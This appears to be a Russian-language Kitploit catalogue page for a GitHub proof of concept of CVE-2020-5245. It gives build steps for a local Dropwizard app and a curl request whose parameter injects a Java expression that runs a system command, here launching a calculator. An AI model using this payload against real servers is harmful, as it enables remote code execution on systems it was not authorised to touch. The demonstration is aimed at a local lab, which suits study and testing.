Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-5245 — Эксплойт, подтверждающий концепцию для CVE-2020-5245, демонстрирующий внедрение языка выражений в REST-эндпоинтах Dropwizard через сформированные HTTP-параметры. | Kitploit
Инструменты/GitHubGitHub/lycshub/cve-2020-5245
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHublycshub/cve-2020-5245

CVE-2020-5245

Эксплойт, подтверждающий концепцию для CVE-2020-5245, демонстрирующий внедрение языка выражений в REST-эндпоинтах Dropwizard через сформированные HTTP-параметры.

Репозиторий
43 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-5245

  1. Выполните mvn clean install для сборки приложения
  2. Запустите приложение с помощью java -jar target/dropwizard-1.0-SNAPSHOT.jar server config.yml
  3. Чтобы проверить, что ваше приложение работает, введите url http://localhost:8080

некоторые ошибки в плагинах pom.xml не были затронуты при воспроизведении

Воспроизведение

curl http://localhost:8080/bookService/selfValidatingBeanParam?answer=${%27%27.getClass().forName(%22javax.script.ScriptEngineManager%22).newInstance().getEngineByName(%22JavaScript%22).eval(%22java.lang.Runtime.getRuntime().exec(%27/usr/bin/gnome-calculator%27)%22)}

Скачать инструмент